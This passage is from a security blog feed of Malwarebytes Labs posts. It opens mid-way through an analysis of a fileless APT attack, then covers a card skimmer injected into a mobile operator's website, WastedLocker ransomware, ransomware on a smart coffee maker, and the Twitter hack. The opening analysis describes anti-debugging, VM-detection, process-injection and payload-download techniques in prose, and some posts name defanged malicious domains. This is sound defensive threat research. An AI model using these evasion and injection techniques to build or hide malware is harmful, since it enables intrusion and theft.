  • CreateSection invokes the ZwCreateSection API to create a section within the target process.
  • ZwMapViewOfSection is called to bind the section to the target process in order to copy the shellcode in by invoking CopyShellcode.
  • MapAndStart finishes the process injection by calling WriteProcessMemory and ResumeThread.
ShellCode Analysis

Using HollowHunter we dumped the shell code injected into WerFault.exe for further analysis. This DLL performs its malicious activities in multiple threads to make its analysis harder.

This DLL is executed by calling the “DllEntryPoint” that invokes the “Main” function.

Figure 8: Main Process

The main function calls DllMain which creates a thread to perform its functions in a new thread within the context of the same process.

Figrue 9: Dll main

The created thread at first performs some anti-analysis checks to make sure it’s not running in an analysis/sandbox environment or in a debugger.

It does this through the following actions:

1) Checks existence of a debugger by calling GetTickCount:

GetTickCount is a timing function that is used to measure the time needed to execute some instruction sets. In this thread, it is being called two times before and after a Sleep instruction and then the difference is being calculated. If it is not equal to 2 the program exits, as it identifies it is being debugged.

Figure 10: Created thread

2) VM detection:

In this function, it checks if it is running in VmWare or VirtualBox by extracting the provider name of the display driver registry key (`SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000′) and then checking if it contains the strings VMware or Oracle.

Figure 11: VM detection

3) IsProcessorFeaturePresent:  

This API call has been used to determine whether the specified processor feature is supported or not. As you see from the below picture, “0x17” has been passed to this API as a parameter which means it checks __fastfail support before proceeding with immediate termination.

Figure 12: InProcessorFeaturePresent

4) NtGlobalFlag:

The shell code checks NtGlobalFlag in PEB structure to identify whether it is being debugged or not. To identify the debugger it compares the NtGlobalFlag value with 0x70.

5) IsDebuggerPresent:

This checks for the presence of a debugger by calling “IsDebuggerPresent“.

Figure 13: NtGlobalFlag and IsDebuggerPresent check

After performing all these anti-analysis checks, it goes into a function to create its final shellcode in a new thread. The import calls used in this part are obfuscated and resolved dynamically by invoking the “Resolve_Imports” function.

This function gets the address of “kernel32.dll” using LoadLibraryEx and then in a loop retrieves 12 imports.

Figure 14: Resolve_Imports

Using the libpeconv library we are able to get the list of resolved API calls. Here is the list of imports, and we can expect it is going to perform some process injection.


After resolving the required API calls it creates a memory region using VirtualAlloc and then calls “DecryptContent_And_WriteToAllocatedMemory” to decrypt the content of the final shell code and write them into created memory.

In the next step, VirtualProtect is called to change the protection to the allocated memory to make it executable. Finally, CreateThread has been called to execute the final shellcode in a new thread.

Figure 15: Resolve Imports and Create new thread Final Shell code

The final shellcode is a set of instructions that make an HTTP request to a hard-coded domain to download a malicious payload and inject it into a process.

As first step it loads the Wininet API by calling LoadLibraryA:

Figure 16: Loads Wininet

Then it builds the list of function calls that are required to make the HTTP request which includes: InternetOpenA, InternetConnectA, InternetOpenRequestA and InternetSetOptionsExA.

Figure 17: HttpOpenRequestA

After preparing the requirements for building HTTP request, it creates a HTTP request and sends it by calling HttpSendrequestExA. The requested URL is:[.]net/favicon32.ico

Figure 18: HttpSendRequestExA

In the next step, it checks if the HTTP request is successful or not. If the HTTP request is not successful it calls ExitProcess to stop its process.

Figure 19: Checking the http request success

If the return value of HTTPSendRequestExA is true, it means the request is successful and the code proceeds to the next step. In this step it calls VirtualAllocExA to allocate a memory region and then calls InternetReadFile to read the data and write it to the allocated memory.

Figure 20: InternetReadFile call

At the end it jumps to the start of the allocated memory to execute it. This is highly likely to be another shellcode that is hosted on the compromised “” site and planted as a fake favicon in there.

Since at the time of the report the target URL was down, we were not able to retrieve this shellcode for further analysis.

The work of an APT, but which one?

We do not have enough evidence to attribute this attack. However, we have found some loose connections to APT32 and are still investigating them:

  • APT32 is one of the actors that is known to use CactusTorch HTA to drop variants of the Denis Rat. However, since we were not able to get the final payload we cannot definitely attribute this attack to APT32.
  • The domain used to host malicious archives and documents is registered in Ho chi minh city, Vietnam. APT32 has used strategic web compromises to target victims and is believed to be Vietnam-based.

Malwarebytes blocks access to the compromised site hosting the payload:

Figure 21: Lure document attempting to contact remote site IOCs

Lure document: 31368f805417eb7c7c905d0ed729eb1bb0fea33f6e358f7a11988a0d2366e942

Archive file containing lure document:

Document template image:

Archive file download URLs:

Download URL for final payload:

The post Release the Kraken: Fileless APT attack abuses Windows Error Reporting service appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Mobile network operator falls into the hands of Fullz House criminal group

Malware Bytes Security - Mon, 10/05/2020 - 4:49pm

Most victims of Magecart-based attacks tend to be typical online shops selling various goods. However, every now and again we come across different types of businesses which were affected simply because they happened to be vulnerable.

Today we take a quick look at a mobile operator who offers cell phone plans to its customers. Their website lets you shop for devices and service with the well known shopping cart experience.

However, criminals related to the Fullz House group that was previously documented for their phishing prowess managed to inject malicious code into the platform and thereby capture data from unaware online shoppers.

Unusual victim

Boom! Mobile is a wireless provider that sells mobile phone plans that operate on the big networks. The Oklahoma-based business advertises great customer service, transparency, and no contracts.

Our crawlers recently detected that their website, boom[.]us, had been injected with a one-liner that contains a Base64 encoded URL loading an external JavaScript library.

Once decoded, the URL loads a fake Google Analytics script from paypal-debit[.]com/cdn/ga.js. We quickly recognize this code as a credit card skimmer that checks for input fields and then exfiltrates the data to the criminals.

This skimmer is quite noisy as it will exfiltrate data every time it detects a change in the fields displayed on the current page. From a network traffic point of view, you can see each leak as a single GET request where the data is Base64 encoded.

Known threat actor

We recognized this domain and code from a previous incident where threat actors were using decoy payment portals set up like phishing pages.

RiskIQ tracked this group under the nickname “Fullz House” due to its use of carding sites to resell “fullz,” a term used by criminals referring to full data packages from victims.

In late September, we noticed a number of new domains that were registered and following the same pattern we had seen before with this group.

However this group was quite active in the summer and continues on a well established pattern seen a year ago. Those domains are on AS 45102 (Alibaba (US) Technology Co., Ltd.), also previously documented by Sucuri.

Website compromise

According to Sucuri, boom[.]us is running PHP version 5.6.40 which was no longer supported as of January 2019. This may have been a point of entry but any other vulnerable plugin could also have been abused by attackers to inject malicious code into the website.

We reported this incident both via live chat and email to Boom! Mobile but have not heard back from them at the time of writing. Their website is still compromised and online shoppers are still at risk.

Malwarebytes Browser Guard was already blocking the skimmer before we detected this incident, therefore prevent the remote script from loading its malicious code.

Thabnks to @AffableKraut and @unmaskparasites for sharing additional IOCs.

Indicators of Compromise

Skimmer domains


Skimmer IPs

Registrant email

The post Mobile network operator falls into the hands of Fullz House criminal group appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (September 28 – October 4)

Malware Bytes Security - Mon, 10/05/2020 - 1:00pm

Last week on Malwarebytes Labs, we dug into what happens when card fraud comes calling, we gave a rundown on some novel ransomware attacks that took advantage of smart coffee makers, and we introduced VideoBytes, our new, monthly series in which we’ll provide video coverage of some of the cybersecurity world’s top stories. In our first week, we gave viewers look at both the infamous Twitter hack and the evolution of ransomware.

Finally, we published our latest episode of Lock and Code, in which we spoke with Open Path co-founder and chief security officer Samy Kamkar about the digital vulnerabilities in our physical world.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (September 28 – October 4) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

VideoBytes: Ransomware gets wasted!

Malware Bytes Security - Fri, 10/02/2020 - 1:00pm

Hello dear readers, and welcome to the latest edition of VideoBytes! On today’s episode, we’re talking about how ransomware is on the rise again, focused on attacking corporations with malware that not only encrypts files, but also steals it

The tactics used to deploy these forms of ransomware have become more capable and the amount of effort that goes into an attack is far greater than what we saw 3 years ago. Ransomware is also evolving as we continuously see new tactics to evade detection and/or increase infection and encryption speed.

Watch on to learn all about it. Or, as our esteemed host always says: Sit back, relax, here come the facts.

A rise in ransomware attacks

A recent study found that 25% of all UK universities have experienced a ransomware attack in the last 10 years, including Sheffield Hallam University that had 42 attacks in the past seven years!

Most of the universities covered in the study had been attacked multiple times. However, of the universities that responded, many reported that they did not pay the ransom, rather they restored from backups.

One point made by Ionut Ilascu from Bleeping Computer mentions that “the results from the FOIA are a poor reflection of the recent period as close to half of all the schools receiving the solicitation refused to give any information, motivating with concerns that admission of attack would only encourage the hackers.”

Logic dictates that going after a previous cybercrime victim is like trying to launch a sneak attack on an enemy who already knows you are coming. Clearly, some folks believe that admitting you have been the victim of a cyber-attack is a sign of weakness or insecurity.

Attackers threaten to report you!

There are possible legal difficulties that may affect whether or not a company pays or even reports a ransomware attack. For example, the General Data Protection Regulation, or GDPR, is a sweeping data privacy and protection law in the European Union that attempts to enforce the safe and secure protection of user data by organizations operating in Europe. 

Admitting that an attack occurred and inviting possible investigation into how secure, or insecure, your data storage policies are may be enough reason for some organizations to downplay attacks. In fact, a ransomware group has recently taken advantage of this and is using GDPR threats to try and extort victims.

For example, servers running the MongoDB database software are being targeted by attackers who are focused on insecure deployments of the software, with the goal of accessing databases, stealing data and replacing it with README files that demand bitcoin payments in 48 hours or else all stolen data will get released online.

Part of the ransom note claims that if the victim doesn’t pay, not only will they release the files, but they will also report the organization to the GDPR authorities, which may lead to a fine or arrest (according to the note, anyway, which is clearly meant to drum up fear).

Victor Gevers of the GDI Foundation, who has been tracking this threat, identified over 15,000 servers that the README ransom note was found on. He obtained this information after querying the internet device search engine Shodan. However, other scanners show up to 23,000 affected servers.

According to a Bleeping Computer article by Lawrence Abrams, which featured Victor Gevers: “With the ransom amount being small at $135.55 and the worry of GDPR violations, Gevers feels that it may cause some people to pay. The actors then know that the data is valuable to the owner and extort them for even more money.”

WastedLocker ransomware lands a whale

That $135 ransom is a lot less than Garmin reportedly paid when it suffered an attack from a ransomware known as WastedLocker, which knocked down a lot of their services in the process. According to media reports, Garmin ended up using a ransomware negotiation company called Arete IR to pay millions of dollars to the attackers and get everything back up and running again.

WastedLocker is a ransomware  tool known to be associated with the Russian Cybercrime Gang: “Evil Corp” and it has been on a bit of a spree over the last few months. And you’re right—it’s not the most inventive name for a cybercriminal gang.

Fake news?

In July it was reported that this same ransomware strain was found infecting networks of dozens of US newspaper websites. They hosted WastedLocker executables on those infected servers and, when needed, would download it from the same sites. The goal was to mask the malicious intent of the traffic by making it look like a user just reading the news.

In addition, Symantec warned folks about this group a month before the Garmin attack was made public. These guys are not messing around; they only seem to go after well-resourced and likely well-researched organizations, unlike other ransomware families we have seen in the past who target anyone willing to run their malware.

Evading protection

An example of this group’s sophistication is their use of new features meant to evade detection by anti-ransomware tools. Many AR tools use the behavior of an untrusted executable doing ransomware-like things to identify a possible ransomware infection, for example, encrypting files and deleting them.

WastedLocker loads files into the “Windows Cache Manager” which can hold temporary versions of files. The malware reads the contents of a victim file into the Windows Cache Manager, then encrypts the data found in the cache, not the file on disk. 

When enough of the data in the cache has been “modified” or encrypted by the ransomware, the cache manager automatically writes the modified data to the original file. In simple terms, it replaces the unencrypted, legitimate file with the encrypted version and it does this under the umbrella of a legitimate system process, not some shady EXE file.

The idea is that if an anti-ransomware tool does not see the malware binary doing the encryption, then maybe it will not detect the malware. However, vendors are already updating their tools to detect this kind of behavior, so it may not be a clever trick for much longer.

The new normal for ransomware

Researchers believe that WastedLocker is manually directed by attackers who utilize things like stolen passwords and outward facing, vulnerable network entry ports that allow them to not just launch malware, but scope out a target and determine the best strategy for attack.  Something like that is more difficult to predict and defend against, especially when the actor is proven to be sophisticated and clever.

Wastedlocker has already proven itself multiple times over as being a dangerous and capable malware. Depending on what Evil Corp wants to do next, they could continue trying to ransom corporate networks or they could set up shop and start selling modified versions of WastedLocker to other cyber criminals. The ransomware-as-a-service scene (yes, you read that right) is very lucrative.


Ransomware-as-a-service is a term used to describe a cybercrime group that develops malware for individual customers to spread. This takes a lot of the overhead out of launching a ransomware attack, because previously an attacker might have needed to develop, steal, or buy their own ransomware, then go about trying to infect people with it. The quality of that ransomware was not guaranteed, and it might not even work.

With more advanced families of ransomware like Cerber and Locky, the value was in the proven effectiveness of the ransomware. The creators of these families only needed to make slight updates and provide individualized modifications to customers (like what email the victim should reach out to) who would then go about distributing the malware.  Once a ransom payment occurs, the creators of the ransomware get their own cut and the distributors get most of the payment.

However, to avoid being scammed by the criminals selling the ransomware, who may include a backdoor in that ransomware, it comes down to reputation of the malware. Have there been news stories about it? Has it been proven in the wild? Combine those queries with the reputation of the creators and sellers of the service: Do they have good relationships with other criminals? Can they be counted on to come through on their end of the bargain?

It’s like buying something off the DarkNet, you have to put your confidence into the seller that they will deliver the product you are buying and a lot of times that comes in the form of previous customer reviews. If a criminal developing malware was putting backdoors into what they were selling, someone would notice and tell other folks about it. Eventually, the vendor will not be trusted anymore, and nobody will buy their wares.

It’s sort of like a rampant free market, but for ransomware, and totally terrible for businesses and consumers. The product with the most reliability, the strongest reviews, and the best, uh, returns, will likely enjoy the most sales.

The post VideoBytes: Ransomware gets wasted! appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Chaos in a cup: When ransomware creeps into your smart coffee maker

Malware Bytes Security - Thu, 10/01/2020 - 12:56pm

When the fledgling concept of the Internet of Things (IoT) was beginning to excite the world almost a decade ago, perhaps no coffee lover at that time would’ve imagined including the coffee machine in the roster of internet-connected devices—even in jest. True, the simple, utilitarian coffee machine may not be as popular now as it used to back in the day, but its continued availability within office premises and private home kitchens, plus inherent risks—much like any IoT device—may be in equal footing with your smart speaker, smart doorbell, or smart light bulb.

Cybersecurity issues surrounding internet-connected coffee machines are further punctuated by the latest news about how Martin Hron, a reverse engineer from Avast, tinkered his Smarter coffee maker to not only beep and spew out hot water but also deprive you of a nice, morning brew and display a short ransom note.

Courtesy of Dan Goodin, Ars Technica

Yes, Hron turned his coffee maker into a ransomware machine by directly modifying its firmware.

Your bedlam before breakfast

Simply put, firmware is software that allows users to control the electronic hardware they’re using. Typically, firmware has no encryption or any form of protection, making it a likely and easy target to hit by malicious hackers and spy agencies.

“My colleagues often hear me say that ‘firmware is a [sic] new software.’ And that software is very often flawed,” writes Hron in a blog post detailing his coffee machine tinkering exploits, “The weakened state of IoT security is due in large part to the fact that, nowadays, it is more convenient and cheap to place a processor inside a device […]. This solution is not only cheap, but has also one important property—it can be updated.”

When it comes to breaking into smart coffee makers to explore vulnerabilities in smart devices, this isn’t Hron’s first rodeo. He also made a ransomware machine out of the coffee maker he hacked in June 2019 to make it do things we’ve seen in the above video. Not only that, he demonstrated that smart devices, in general, can be used as a gateway into private networks, allowing threat actors to do as they please within this space. From snooping on every device connected to the same network the coffee machine is connected to, to intercepting communication between and among users, to downloading sensitive data, to uploading malicious software.

Unfortunately, the latter was what happened to one company when ransomware was suddenly introduced in their system via a compromised coffee machine.

Coffee, connectivity, and a ransom note

A Reddit user who went by the handle C10H15N1—they admitted to the alias being a throw-away one to maintain anonymity—realized first-hand how a small mistake in setting up IoT devices in the workplace could cause panic and potentially massive problems if not dealt with early on.

Three years ago, they recounted in a post, they were faced with a problem when an operator of a local factory control system reported that all four computers with monitoring software installed were down and showing an error message, which we later on find out is actually a ransomware message. As a programmable logic controllers (PLC) expert, C10H15N1 assisted the operator to find out what’s wrong and come up with a solution. First, the operator described to him what sounded like a ransomware infection—something that wouldn’t happen given that the affected computers, which were still running on an outdated version of Windows XP, were not connected to the internet.

C10H15N1 then instructed the operator to restart the computers and reinstall a fresh image. It worked for a while, then one-by-one, the computers started showing the same error again, leaving C10H15N1 stumped. While in the middle of figuring out why the computers got reinfected, the operator went off to get coffee, only to come back empty handed because he couldn’t get a cup as the coffee machines were displaying the same error message.

At the end of the day, no human or machine were harmed during the attack. They eventually realized that malicious actors used the coffee machines as a platform to infect other computers within their network. Normally, smart coffee machines are connected to their own, isolated Wi-Fi; however, the third-party personnel who installed the percolators connected them to the control room network via a cable.

Nevertheless, C10H15N1’s company sent out a scathing letter to their coffee machine supplier about what happened.

What can you do to protect yourself from troubles your smart coffee machine may cause you?

While it is true that IoT ransomware is no longer a theory but a reality—albeit rare—this doesn’t mean that it’s alright for organizations and consumers alike to keep their guard down. Now that we have a real-world scenario, coupled with multiple feats of security researchers successfully hacking into smart percolators [1][2][3][4][5][6][7], IoT ransomware must be on every enterprise’s and private citizen’s radars. They should already be thinking of ways to better protect themselves. Let’s start with these:

  • Ensure that your smart percolator is not connected to a network that is also connected to by systems with sensitive information. Also avoid connecting to a network where sensitive communication within your organization (or home) takes place.
  • Update your smart percolator’s firmware ASAP.
  • Secure your network. Instead of using your router’s default password, change it to a more complex one.

When it comes to whether you should get an IoT device or not, the general rule is to first ask yourself this question: Do I really need my light bulb/coffee pot/washing machine/doorbell/other household items to be smart?

If your answer is “no”, then you should keep using the items and appliances you are using. However, if having an IoT in the home is unavoidable—you really need to replace that broken TV, and no shop is selling the same make and model anymore—then by all means buy that smart TV, and that smart coffee maker, too, while you’re at it. But please make sure that you do everything you can to stay protected. Remember that your supplier has their part to play in the security of things. You have your part, too.

Happy International Coffee Day! Keep that coffee flowing and, as always, stay safe!

The post Chaos in a cup: When ransomware creeps into your smart coffee maker appeared first on Malwarebytes Labs.

Categories: Malware Bytes

VideoBytes: Twitter gets hacked!

Malware Bytes Security - Thu, 10/01/2020 - 12:00pm

Hello dear readers, and welcome to the latest and greatest from VideoBytes: a brand new, video feature that we announced just yesterday.

On our debut post today, we’re talking to you about the Twitter hack, in which hackers accessed the Twitter accounts of 130 high profile figures, like Barack Obama, Joe Biden and Elon Musk by gaining access to an employee administrative panel.

Watch on to learn all about it! Or, as our esteemed host always says: Sit back, relax, here come the facts.

(And a quick note to our readers: For just a couple of days, you may see a YouTube title that doesn’t mention “VideoBytes.” Do not worry, there is nothing wrong with your … er, television set? That’s us, updating our videos as we move along.)

The Attack

The hackers called Twitter employees on their phones and tricked them into handing over their passwords. Basically, they used some simple social engineering. They accomplished this by calling a lot of people and eventually obtaining a few passwords for accounts with fewer accesses.  The attackers then worked their way into compromising accounts with more accesses and reset the passwords for 45 of the targeted accounts and logged in.

The Damage

According to Twitter, 130 total accounts were targeted, 45 of them had tweets sent by attackers, 36 accounts had their direct messages accessed and a few accounts had their Twitter data archive downloaded. Yikes.

The tweets sent by the attackers using the hijacked accounts all pointed to a bitcoin gathering scam. Each tweet claimed that the user was “giving back” by sending people double the bitcoin they put into a wallet. If that immediately sounds too good to be true, well, it was.

The cryptocurrency wallet set up by the hackers collected about $120,000 worth of bitcoins. Interestingly enough, it could have been a lot more, but Coinbase, the US-based cryptocurrency exchange, blacklisted the bitcoin address for the hackers’ wallet. The exchange company therefor prevented almost 1000 users from getting scammed and sending bitcoin worth approximately $280,000 over to the hackers. Good work.


In response to this attack, Twitter blocked all accounts involved from tweeting for 3 hours while they cleaned it up.

To reduce the chance of it happening again, Twitter admins are also significantly limiting employee access to internal systems during the investigation and improving tools to identify unauthorized access to their internal systems.

Finally, Twitter is rolling out company-wide phishing training.

The administrative tools the hackers gained access to could disable two-factor authentication. So, victims had no chance of preventing their accounts from being hijacked.  It was an unfortunate, but thankfully not devastating, lesson for the social media company.

The post VideoBytes: Twitter gets hacked! appeared first on Malwarebytes Labs.

Categories: Malware Bytes